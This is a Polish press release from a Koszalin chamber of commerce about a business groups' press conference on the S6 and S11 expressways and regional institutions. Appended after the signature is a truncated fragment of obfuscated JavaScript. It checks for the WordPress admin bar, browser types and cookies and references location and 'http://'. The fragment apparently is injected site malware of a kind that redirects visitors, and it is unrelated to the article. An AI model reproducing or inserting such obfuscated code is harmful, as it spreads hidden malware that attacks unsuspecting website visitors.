Konferencja prasowa organizacji gospodarczych: S6, S11 oraz instytucji w regionie | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo,
wczoraj tj. 2 lipca o godzinie 11 w Restauracji Park Caffe, odbyła się konferencja prasowa organizacji gospodarczych z terenu Pomorza Środkowego w tym: Północnej Izby Gospodarczej, Koszalińskiej Izby Przemysłowo-Handlowej, Kołobrzeskiej Izby Gospodarczej, Zrzeszenia Kupców i Przedsiębiorców, Słupskiej Izby Przemysłowo- Handlowej, BCC Loża Koszalińska dotycząca trzech zagadnień:

W pierwszej kolejności przedsiębiorcy pytali o planowaną budowy drogi krajowej S6 na odcinku Bożepole Wielkie – Sianów oraz dlaczego wyeliminowano z projektu budowy węzła w miejscowości Gorzebądz koło Sianowa.

Drugie pytanie również było skierowane do Ministra Infrastruktury Pana Andrzeja Adamczyka o planowanej budowie drogi krajowej S11 – kiedy będzie zrealizowana inwestycja na odcinku Bobolice – Koszalin a także wykazanie konieczności rozpoczęcia prac na odcinku od Szczecinka do Bobolic.

Ostatnie zagadnienie dotyczyło wojewódzkich instytucji w regionie, które już w Koszalinie istnieją, a także tych, które warto by tu utworzyć. – Jeżeli region ma się rozwijać i jeżeli chcemy województwa środkowopomorskiego, to muszą u nas powstawać kolejne instytucje regionalne – twierdzą zgodnie przedsiębiorcy. Przy tym pytają też o dalsze losy Zakładu Gazowniczego w Koszalinie.

Marian Jagiełka z Kołobrzeskiej Izby Gospodarczej zwrócił z kolei uwagę na konieczność rozpoczęcia działań na rzecz stworzenia przynajmniej aglomeracji koszalińsko-kołobrzeskiej: – Najwyższa pora, aby ten proces rozpocząć. Droga nr 6 skróci dystans między miastami do 30 minut. Znakomicie uzupełniamy się, jeżeli chodzi o różne instytucje, m.in. kulturalne. Stworzenie aglomeracji koszalińsko-kołobrzeskiej jest w zasięgu ręki.

Pisma zostały wysłane odpowiednio do minister spraw wewnętrznych Elżbiety Witek oraz ministra infrastruktury Andrzeja Adamczyka.

   
                                                                                                                   / – / Roman Biłas

                                                                                                   Prezes Północnej Izby Gospodarczej
                                                                                                                Oddział w Koszalinie

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m